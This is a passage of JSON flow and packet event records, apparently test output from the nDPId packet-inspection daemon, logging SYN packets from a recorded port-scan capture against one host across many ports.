-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":452,"source":"synscan.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"synscan.pcap","alias":"nDPId-test","flow_id":446,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsxT8AACsGWDOsEAAIQA2GNIzTDsjdU4MZAAAAAGACEAAZxAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":453,"source":"synscan.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":453,"source":"synscan.pcap","alias":"nDPId-test","flow_id":447,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsxeYAADUGTYysEAAIQA2GNIzTAP7dU4MZAAAAAGACCAAvjgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"synscan.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"synscan.pcap","alias":"nDPId-test","flow_id":448,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsqJkAADAGb9msEAAIQA2GNIzTBC7dU4MZAAAAAGACBAAwXgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":455,"source":"synscan.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2393,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"synscan.pcap","alias":"nDPId-test","flow_id":449,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsvKcAADUGVsusEAAIQA2GNIzTCVndU4MZAAAAAGACCAAnMwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":456,"source":"synscan.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2909,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"synscan.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsMdwAAC8G55asEAAIQA2GNIzTC13dU4MZAAAAAGACEAAdLwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":457,"source":"synscan.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"synscan.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsqPUAADYGaX2sEAAIQA2GNIzTC5jdU4MZAAAAAGACDAAg9AAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"synscan.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8651,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"synscan.pcap","alias":"nDPId-test","flow_id":452,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsCE0AADsGBSasEAAIQA2GNIzSIcvdUoMYAAAAAGACEAAGxAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":459,"source":"synscan.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1805,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"synscan.pcap","alias":"nDPId-test","flow_id":453,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsWgYAADoGtGysEAAIQA2GNIzSBw3dUoMYAAAAAGACDAAlggAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":460,"source":"synscan.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25734,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"synscan.pcap","alias":"nDPId-test","flow_id":454,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAs1tAAADcGOqKsEAAIQA2GNIzSZIbdUoMYAAAAAGACEADECAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"synscan.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15742,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"synscan.pcap","alias":"nDPId-test","flow_id":455,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsK0kAACkG9CmsEAAIQA2GNIzSPX7dUoMYAAAAAGACCADzEAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":462,"source":"synscan.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":912,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"synscan.pcap","alias":"nDPId-test","flow_id":456,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsWw4AADMGumSsEAAIQA2GNIzSA5DdUoMYAAAAAGACEAAk\/wAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":463,"source":"synscan.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":726,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"synscan.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAshmMAADYGjA+sEAAIQA2GNIzSAtbdUoMYAAAAAGACDAApuQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":464,"source":"synscan.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7741,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"synscan.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsmFEAADIGfiGsEAAIQA2GNIzSHj3dUoMYAAAAAGACDAAOUgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"synscan.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4662,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"synscan.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsd88AAC0Go6OsEAAIQA2GNIzSEjbdUoMYAAAAAGACCAAeWQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"synscan.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"synscan.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsmn4AADMGevSsEAAIQA2GNIzSCvDdUoMYAAAAAGACEAAdnwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":467,"source":"synscan.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"synscan.pcap","alias":"nDPId-test","flow_id":461,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsqJ0AADoGZdWsEAAIQA2GNIzSGMrdUoMYAAAAAGACDAATxQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":468,"source":"synscan.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":57797,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"synscan.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAshmMAACwGlg+sEAAIQA2GNIzS4cXdUoMYAAAAAGACBABSyQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"synscan.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"synscan.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsGYYAADYG+OysEAAIQA2GNIzSEB7dUoMYAAAAAGACDAAccQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":470,"source":"synscan.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"synscan.pcap","alias":"nDPId-test","flow_id":464,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAsEPYAAC4GCX2sEAAIQA2GNIzSJMfdUoMYAAAAAGACDAAHyAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":471,"source":"synscan.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"synscan.pcap","alias":"nDPId-test","flow_id":465,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAs5SkAAC4GNUmsEAAIQA2GNIzSCHHdUoMYAAAAAGACDAAkHgAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"synscan.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":82,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"synscan.pcap","alias":"nDPId-test","flow_id":466,"flow_packet_id":1,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059096,"pkt":"ACYLMQczACWzv5HuCABFAAAslo0AADMGfuWsEAAIQA2GNIzSAFLdUoMYAAAAAGACEAAoPQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":473,"source":"synscan.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1688,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"synscan.pcap","alias":"nDPId-test","flow_id":467,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsm08AADAGfSOsEAAIQA2GNIzTBpjdU4MZAAAAAGACBAAt9AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"synscan.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"synscan.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAsyLMAACUGWr+sEAAIQA2GNIzTBBjdU4MZAAAAAGACCAAsdAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"synscan.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"synscan.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":1,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059155,"pkt":"ACYLMQczACWzv5HuCABFAAAs0ZUAADQGQt2sEAAIQA2GNIzTFFDdU4MZAAAAAGACBAAgPAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":476,"source":"synscan.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 